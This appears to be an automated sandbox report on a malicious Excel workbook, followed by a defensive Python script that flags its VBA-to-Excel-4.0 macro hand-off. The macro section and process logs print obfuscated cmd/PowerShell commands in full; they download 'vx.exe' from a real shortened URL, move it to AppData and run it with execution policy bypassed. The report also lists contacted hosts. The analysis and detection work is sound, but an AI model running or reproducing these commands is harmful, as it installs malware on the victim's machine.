                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                Attribute VB_GlobalNameSpace = False
                                                Attribute VB_Creatable = False
                                                Attribute VB_PredeclaredId = True
                                                Attribute VB_Exposed = True
                                                Attribute VB_TemplateDerived = False
                                                Attribute VB_Customizable = True
                                                VBA File Name: Module1.bas, Stream Size: 1512
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/Module1
                                                VBA File Name:Module1.bas
                                                Stream Size:1512
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . B . . . . . . . . . . . P , : u . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:01 16 01 00 03 f0 00 00 00 dc 02 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 0a 03 00 00 42 05 00 00 00 00 00 00 01 00 00 00 50 2c 3a 75 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 04 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                VBA Code Keywords

                                                Keyword
                                                (strMacro)
                                                strMacro
                                                Attribute
                                                auto_open()
                                                VB_Name
                                                String
                                                VBA Code
                                                 Attribute VB_Name = "Module1"
                                                 Sub auto_open()
                                                     Dim strMacro As String
                                                     Sheets(1).Range("E580").Name = "Auto_ouvrir51"
                                                     strMacro = "Auto_ouvrir51"
                                                     Run (strMacro)
                                                 End Sub
                                                VBA File Name: ThisWorkbook.cls, Stream Size: 985
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                VBA File Name:ThisWorkbook.cls
                                                Stream Size:985
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P , . + . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 50 2c c8 2b 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                VBA Code Keywords

                                                Keyword
                                                False
                                                VB_Exposed
                                                Attribute
                                                VB_Name
                                                VB_Creatable
                                                "ThisWorkbook"
                                                VB_PredeclaredId
                                                VB_GlobalNameSpace
                                                VB_Base
                                                VB_Customizable
                                                VB_TemplateDerived
                                                VBA Code
                                                Attribute VB_Name = "ThisWorkbook"
                                                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                Attribute VB_GlobalNameSpace = False
                                                Attribute VB_Creatable = False
                                                Attribute VB_PredeclaredId = True
                                                Attribute VB_Exposed = True
                                                Attribute VB_TemplateDerived = False
                                                Attribute VB_Customizable = True

                                                Streams

                                                Stream Path: \x1CompObj, File Type: data, Stream Size: 115
                                                General
                                                Stream Path:\x1CompObj
                                                File Type:data
                                                Stream Size:115
                                                Entropy:4.26356656053
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F ' . . . F e u i l l e d e c a l c u l M i c r o s o f t E x c e l . 2 0 0 3 . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 27 00 00 00 46 65 75 69 6c 6c 65 20 64 65 20 63 61 6c 63 75 6c 20 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c a0 32 30 30 33 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 296
                                                General
                                                Stream Path:\x5DocumentSummaryInformation
                                                File Type:data
                                                Stream Size:296
                                                Entropy:3.12351939639
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . M a c r o 1 . . . . . . . . . . . . . . . . . . . F e u i l l e s d e c a l c u l . .
                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f8 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 ac 00 00 00
                                                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 224
                                                General
                                                Stream Path:\x5SummaryInformation
                                                File Type:data
                                                Stream Size:224
                                                Entropy:3.82752718687
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D e x t e r M O R G A N . . . . . . . . . . . A d m i n i s t r a t o r . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . . . . . . @ . . . . . W . . . . . . . . . . . .
                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 b0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 60 00 00 00 12 00 00 00 78 00 00 00 0c 00 00 00 90 00 00 00 0d 00 00 00 9c 00 00 00 13 00 00 00 a8 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 0e 00 00 00
                                                Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 61163
                                                General
                                                Stream Path:Workbook
                                                File Type:Applesoft BASIC program data, first line number 16
                                                Stream Size:61163
                                                Entropy:7.20561555755
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . T 8 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . U s e r n i s t r a t o r B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . B T . . 8 . . . . . . . X
                                                Data Raw:09 08 10 00 00 06 05 00 54 38 cd 07 c9 00 02 00 06 07 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 55 73 65 72 6e 69 73 74 72 61 74 6f 72 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 533
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                File Type:ASCII text, with CRLF line terminators
                                                Stream Size:533
                                                Entropy:5.2193098334
                                                Base64 Encoded:True
                                                Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 86
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                File Type:data
                                                Stream Size:86
                                                Entropy:3.21559847503
                                                Base64 Encoded:False
                                                Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2607
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                File Type:data
                                                Stream Size:2607
                                                Entropy:4.00233365281
                                                Base64 Encoded:False
                                                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 1136
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
                                                File Type:data
                                                Stream Size:1136
                                                Entropy:4.08521227715
                                                Base64 Encoded:False
                                                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 74
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
                                                File Type:data
                                                Stream Size:74
                                                Entropy:1.7969826379
                                                Base64 Encoded:False
                                                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 84
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
                                                File Type:data
                                                Stream Size:84
                                                Entropy:1.91120509258
                                                Base64 Encoded:False
                                                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 103
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
                                                File Type:data
                                                Stream Size:103
                                                Entropy:1.89141813866
                                                Base64 Encoded:False
                                                Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 568
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                File Type:data
                                                Stream Size:568
                                                Entropy:6.35089764744
                                                Base64 Encoded:True

                                                Macro 4.0 Code

                                                =ERROR(FALSE; (B100))
                                                =IF(GET.WORKSPACE(19);;CLOSE(TRUE))
                                                =IF(GET.WORKSPACE(42);;CLOSE(TRUE))
                                                =EXEC(CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&CHAR(32)&CHAR(112)&CHAR(111)&"wer^she"&CHAR(108)&CHAR(108)&CHAR(32)&" -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').""Invoke""('"&CHAR(104)&"ttps://cutt.ly/ZhqUH1O','vx.exe')")
                                                =EXEC(CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&CHAR(32)&CHAR(112)&CHAR(111)&"wer^she"&CHAR(108)&CHAR(108)&CHAR(32)&" -w 1 stARt`-slE`Ep 20; Move-Item ""vx.exe"" -Destination ""${enV`:appdata}""")
                                                =EXEC(CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&CHAR(32)&CHAR(112)&CHAR(111)&"wer^she"&CHAR(108)&CHAR(108)&CHAR(32)&" -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe")
                                                =PAUSE()

                                                Network Behavior

                                                Network Port Distribution

                                                TCP Packets

                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Nov 19, 2020 09:56:41.368407011 CET | 49165 | 443 | 192.168.2.22 | 104.22.0.232
                                                Nov 19, 2020 09:56:41.393265963 CET | 443 | 49165 | 104.22.0.232 | 192.168.2.22
                                                Nov 19, 2020 09:56:41.393454075 CET | 49165 | 443 | 192.168.2.22 | 104.22.0.232
                                                Nov 19, 2020 09:56:41.404120922 CET | 49165 | 443 | 192.168.2.22 | 104.22.0.232
                                                Nov 19, 2020 09:56:41.426343918 CET | 443 | 49165 | 104.22.0.232 | 192.168.2.22
                                                Nov 19, 2020 09:56:41.431905985 CET | 443 | 49165 | 104.22.0.232 | 192.168.2.22
                                                Nov 19, 2020 09:56:41.431948900 CET | 443 | 49165 | 104.22.0.232 | 192.168.2.22
                                                Nov 19, 2020 09:56:41.431972027 CET | 443 | 49165 | 104.22.0.232 | 192.168.2.22
                                                Nov 19, 2020 09:56:41.432027102 CET | 49165 | 443 | 192.168.2.22 | 104.22.0.232
                                                Nov 19, 2020 09:56:41.443662882 CET | 49165 | 443 | 192.168.2.22 | 104.22.0.232
                                                Nov 19, 2020 09:56:41.465800047 CET | 443 | 49165 | 104.22.0.232 | 192.168.2.22
                                                Nov 19, 2020 09:56:41.465835094 CET | 443 | 49165 | 104.22.0.232 | 192.168.2.22
                                                Nov 19, 2020 09:56:41.683109999 CET | 49165 | 443 | 192.168.2.22 | 104.22.0.232
                                                Nov 19, 2020 09:56:41.693226099 CET | 443 | 49165 | 104.22.0.232 | 192.168.2.22
                                                Nov 19, 2020 09:56:41.693289995 CET | 49165 | 443 | 192.168.2.22 | 104.22.0.232
                                                Nov 19, 2020 09:56:42.633673906 CET | 49165 | 443 | 192.168.2.22 | 104.22.0.232
                                                Nov 19, 2020 09:56:42.655935049 CET | 443 | 49165 | 104.22.0.232 | 192.168.2.22
                                                Nov 19, 2020 09:56:42.769054890 CET | 443 | 49165 | 104.22.0.232 | 192.168.2.22
                                                Nov 19, 2020 09:56:42.769084930 CET | 443 | 49165 | 104.22.0.232 | 192.168.2.22
                                                Nov 19, 2020 09:56:42.769162893 CET | 49165 | 443 | 192.168.2.22 | 104.22.0.232
                                                Nov 19, 2020 09:56:43.101838112 CET | 49167 | 443 | 192.168.2.22 | 202.92.6.10
                                                Nov 19, 2020 09:56:43.415772915 CET | 443 | 49167 | 202.92.6.10 | 192.168.2.22
                                                Nov 19, 2020 09:56:43.415868998 CET | 49167 | 443 | 192.168.2.22 | 202.92.6.10
                                                Nov 19, 2020 09:56:43.416306019 CET | 49167 | 443 | 192.168.2.22 | 202.92.6.10
                                                Nov 19, 2020 09:56:43.729902029 CET | 443 | 49167 | 202.92.6.10 | 192.168.2.22
                                                Nov 19, 2020 09:56:43.729928970 CET | 443 | 49167 | 202.92.6.10 | 192.168.2.22
                                                Nov 19, 2020 09:56:43.729939938 CET | 443 | 49167 | 202.92.6.10 | 192.168.2.22
                                                Nov 19, 2020 09:56:43.729953051 CET | 443 | 49167 | 202.92.6.10 | 192.168.2.22
                                                Nov 19, 2020 09:56:43.730106115 CET | 49167 | 443 | 192.168.2.22 | 202.92.6.10
                                                Nov 19, 2020 09:56:43.743868113 CET | 49167 | 443 | 192.168.2.22 | 202.92.6.10
                                                Nov 19, 2020 09:56:43.744518042 CET | 49168 | 443 | 192.168.2.22 | 202.92.6.10
                                                Nov 19, 2020 09:56:44.057604074 CET | 443 | 49167 | 202.92.6.10 | 192.168.2.22
                                                Nov 19, 2020 09:56:44.057631016 CET | 443 | 49167 | 202.92.6.10 | 192.168.2.22
                                                Nov 19, 2020 09:56:44.058506966 CET | 443 | 49168 | 202.92.6.10 | 192.168.2.22
                                                Nov 19, 2020 09:56:44.058621883 CET | 49167 | 443 | 192.168.2.22 | 202.92.6.10
                                                Nov 19, 2020 09:56:44.058650970 CET | 49168 | 443 | 192.168.2.22 | 202.92.6.10
                                                Nov 19, 2020 09:56:44.059086084 CET | 49168 | 443 | 192.168.2.22 | 202.92.6.10
                                                Nov 19, 2020 09:56:44.373168945 CET | 443 | 49168 | 202.92.6.10 | 192.168.2.22
                                                Nov 19, 2020 09:56:44.373213053 CET | 443 | 49168 | 202.92.6.10 | 192.168.2.22
                                                Nov 19, 2020 09:56:44.373256922 CET | 443 | 49168 | 202.92.6.10 | 192.168.2.22
                                                Nov 19, 2020 09:56:44.373271942 CET | 443 | 49168 | 202.92.6.10 | 192.168.2.22
                                                Nov 19, 2020 09:56:44.373400927 CET | 49168 | 443 | 192.168.2.22 | 202.92.6.10
                                                Nov 19, 2020 09:56:44.375323057 CET | 49168 | 443 | 192.168.2.22 | 202.92.6.10
                                                Nov 19, 2020 09:56:44.689218998 CET | 443 | 49168 | 202.92.6.10 | 192.168.2.22
                                                Nov 19, 2020 09:56:44.724005938 CET | 49165 | 443 | 192.168.2.22 | 104.22.0.232

                                                UDP Packets

                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Nov 19, 2020 09:56:41.343724012 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
                                                Nov 19, 2020 09:56:41.356940985 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
                                                Nov 19, 2020 09:56:41.895869970 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
                                                Nov 19, 2020 09:56:41.914530039 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22
                                                Nov 19, 2020 09:56:41.918118954 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
                                                Nov 19, 2020 09:56:41.930485964 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22
                                                Nov 19, 2020 09:56:42.774435997 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8
                                                Nov 19, 2020 09:56:43.100631952 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22

                                                DNS Queries

                                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                Nov 19, 2020 09:56:41.343724012 CET | 192.168.2.22 | 8.8.8.8 | 0xc6cc | Standard query (0) | cutt.ly | A (IP address) | IN (0x0001)
                                                Nov 19, 2020 09:56:42.774435997 CET | 192.168.2.22 | 8.8.8.8 | 0x1bac | Standard query (0) | shopphongtinh.com | A (IP address) | IN (0x0001)

                                                DNS Answers

                                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                Nov 19, 2020 09:56:41.356940985 CET | 8.8.8.8 | 192.168.2.22 | 0xc6cc | No error (0) | cutt.ly | | 104.22.0.232 | A (IP address) | IN (0x0001)
                                                Nov 19, 2020 09:56:41.356940985 CET | 8.8.8.8 | 192.168.2.22 | 0xc6cc | No error (0) | cutt.ly | | 172.67.8.238 | A (IP address) | IN (0x0001)
                                                Nov 19, 2020 09:56:41.356940985 CET | 8.8.8.8 | 192.168.2.22 | 0xc6cc | No error (0) | cutt.ly | | 104.22.1.232 | A (IP address) | IN (0x0001)
                                                Nov 19, 2020 09:56:43.100631952 CET | 8.8.8.8 | 192.168.2.22 | 0x1bac | No error (0) | shopphongtinh.com | | 202.92.6.10 | A (IP address) | IN (0x0001)

                                                HTTPS Packets

                                                Timestamp | Source IP | Source Port | Dest IP | Dest Port
                                                Nov 19, 2020 09:56:41.431972027 CET | 104.22.0.232 | 443 | 192.168.2.22 | 49165
                                                  Subject: CN=www.cutt.ly
                                                  Issuer: CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US
                                                  Not Before: Sat Feb 08 01:00:00 CET 2020
                                                  Not After: Thu Apr 08 14:00:00 CEST 2021
                                                  JA3 SSL Client Fingerprint: 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0
                                                  JA3 SSL Client Digest: 05af1f5ca1b87cc9cc9b25185115607d
                                                  Chain certificate Subject: CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US
                                                  Chain certificate Issuer: CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US
                                                  Chain certificate Not Before: Thu Nov 02 13:24:33 CET 2017
                                                  Chain certificate Not After: Tue Nov 02 13:24:33 CET 2027

                                                System Behavior

                                                General

                                                Start time:09:56:43
                                                Start date:19/11/2020
                                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                Wow64 process (32bit):false
                                                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                Imagebase:0x13f6e0000
                                                File size:27641504 bytes
                                                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Start time:09:56:46
                                                Start date:19/11/2020
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
                                                Imagebase:0x4aa10000
                                                File size:345088 bytes
                                                MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate

                                                General

                                                Start time:09:56:46
                                                Start date:19/11/2020
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
                                                Imagebase:0x4aa10000
                                                File size:345088 bytes
                                                MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate

                                                General

                                                Start time:09:56:47
                                                Start date:19/11/2020
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
                                                Imagebase:0x4aa10000
                                                File size:345088 bytes
                                                MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate

                                                General

                                                Start time:09:56:47
                                                Start date:19/11/2020
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
                                                Imagebase:0x13f0f0000
                                                File size:473600 bytes
                                                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Reputation:high

                                                General

                                                Start time:09:56:47
                                                Start date:19/11/2020
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
                                                Imagebase:0x13f0f0000
                                                File size:473600 bytes
                                                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Reputation:high

                                                General

                                                Start time:09:56:48
                                                Start date:19/11/2020
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
                                                Imagebase:0x13f0f0000
                                                File size:473600 bytes
                                                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Reputation:high

                                                Disassembly

                                                Code Analysis


                                                Module: Feuil1

                                                Declaration
                                                Line | Content
                                                1 | Attribute VB_Name = "Feuil1"
                                                2 | Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                3 | Attribute VB_GlobalNameSpace = False
                                                4 | Attribute VB_Creatable = False
                                                5 | Attribute VB_PredeclaredId = True
                                                6 | Attribute VB_Exposed = True
                                                7 | Attribute VB_TemplateDerived = False
                                                8 | Attribute VB_Customizable = True

                                                Module: Module1

                                                Declaration
                                                Line | Content
                                                1 | Attribute VB_Name = "Module1"

                                                Executed Functions
                                                APIsMeta Information

                                                Range

                                                Run

                                                Run("Auto_ouvrir51")
                                                StringsDecrypted Strings
                                                "Auto_ouvrir51"
                                                "E580"
                                                "Auto_ouvrir51"
                                                LineInstructionMeta Information
                                                2

                                                Sub auto_open()

                                                5

                                                Dim strMacro as String

                                                executed
                                                10

                                                Sheets(1).Range("E580").Name = "Auto_ouvrir51"

                                                Range

                                                13

                                                strMacro = "Auto_ouvrir51"

                                                14

                                                Run (strMacro)

                                                Run("Auto_ouvrir51")

                                                executed
                                                18

                                                End Sub
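The Module1 listing above is the entire VBA layer of the sample: it attaches the defined name Auto_ouvrir51 to cell E580 of the first sheet, stores that name in a string variable, and calls Run on the variable. Run on a defined name that points at a cell makes Excel execute the Excel 4.0 (XLM) macro formulas starting there, so the actual payload lives in the sheet cells, not in the VBA, and a scanner that only scores VBA API usage sees one Range assignment and one Run. The Python below is an added triage example written for this page; it is not part of the report and not code from any tool the report names. It runs regex heuristics over extracted VBA source text (the kind of text olevba or a similar extractor returns), resolves the string variable handed to Run, and flags the "name a cell, then Run the name" hand-off. The sample input is the report's own Module1 source reconstructed as a string, the benign control is constructed, and the regexes and the Auto_Open-family name list (including the French localization Auto_Ouvrir) are this example's own assumptions, not a vendor signature set.

```python
import re
from dataclasses import dataclass

# Constructed sample: the Module1 source shown in the report, laid out as the
# text an extractor (for example olevba) would return. Triage input only.
SAMPLE_VBA = '''Attribute VB_Name = "Module1"
Sub auto_open()
    Dim strMacro as String
    Sheets(1).Range("E580").Name = "Auto_ouvrir51"
    strMacro = "Auto_ouvrir51"
    Run (strMacro)
End Sub
'''

# Constructed benign control: touches a cell but never defines or runs a name.
BENIGN_VBA = '''Sub Macro1()
    Range("A1").Value = 1
End Sub
'''

# Heuristic patterns (assumptions of this example, not a vendor signature set).
AUTOEXEC = re.compile(
    r'^\s*(?:Private\s+|Public\s+)?Sub\s+'
    r'(auto_open|auto_close|workbook_open|workbook_close|workbook_beforeclose)\b',
    re.I | re.M)
# Range("E580").Name = "Auto_ouvrir51"        -> (cell, name)
NAME_ASSIGN = re.compile(
    r'\bRange\(\s*"([^"]+)"\s*\)\s*\.Name\s*=\s*"([^"]+)"', re.I)
# strMacro = "Auto_ouvrir51"                  -> (variable, literal)
STR_ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*"([^"]+)"\s*$', re.I | re.M)
# Run (strMacro) / Run("Auto_ouvrir51") / Application.Run "x"  -> token
RUN_CALL = re.compile(
    r'\b(?:Application\.)?Run\s*\(?\s*("?)([^"\s(),]+)\1', re.I)
# Auto_Open and localized forms such as the French Auto_Ouvrir (assumed list).
AUTOEXEC_NAME = re.compile(r'^auto_(open|ouvrir|close|fermer)', re.I)


@dataclass
class Triage:
    autoexec_subs: list
    named_cells: dict      # defined name -> cell it was attached to
    run_targets: list      # what Run() was asked to execute, variables resolved
    pivots: list           # names both attached to a cell and passed to Run


def analyze(vba_src: str) -> Triage:
    """Static pass over VBA source text; nothing is executed."""
    subs = [m.group(1).lower() for m in AUTOEXEC.finditer(vba_src)]
    named = {name: cell for cell, name in NAME_ASSIGN.findall(vba_src)}
    consts = {var.lower(): lit for var, lit in STR_ASSIGN.findall(vba_src)}
    targets = []
    for m in RUN_CALL.finditer(vba_src):
        quoted, token = m.group(1), m.group(2)
        # A bare identifier is resolved through the string assignments seen
        # in the source; a quoted literal is taken as-is.
        targets.append(token if quoted else consts.get(token.lower(), token))
    pivots = [t for t in targets if t in named]
    return Triage(subs, named, targets, pivots)


def verdict(t: Triage):
    """Return ("suspicious"|"clean", reasons) for one analyzed module."""
    reasons = []
    if t.autoexec_subs:
        reasons.append("auto-exec entry point: " + ", ".join(t.autoexec_subs))
    if t.pivots:
        reasons.append("VBA names a cell and then Run()s that name (XLM hand-off): "
                       + ", ".join(f"{n} -> {t.named_cells[n]}" for n in t.pivots))
    if any(AUTOEXEC_NAME.match(n) for n in t.named_cells):
        reasons.append("defined name in the Auto_Open family (incl. localized forms)")
    return ("suspicious" if reasons else "clean"), reasons


if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        level, why = verdict(analyze(src))
        print(f"{label}: {level}")
        for r in why:
            print("  -", r)
```

The point of resolving the variable is that the Run target never appears as a literal argument in the sample; matching only `Run("...")` would miss it. The result is a lead for the analyst, not a verdict on the workbook: the XLM formulas at E580 still have to be extracted and deobfuscated separately.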

Module: ThisWorkbook

Declaration
Line  Content
1     Attribute VB_Name = "ThisWorkbook"
2     Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
3     Attribute VB_GlobalNameSpace = False
4     Attribute VB_Creatable = False
5     Attribute VB_PredeclaredId = True
6     Attribute VB_Exposed = True
7     Attribute VB_TemplateDerived = False
8     Attribute VB_Customizable = True

Executed Functions

Memory Dump Source
• Source File: 00000007.00000002.2125837651.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
• Similarity: API ID, String ID and API String ID empty (no API or string matches recorded)
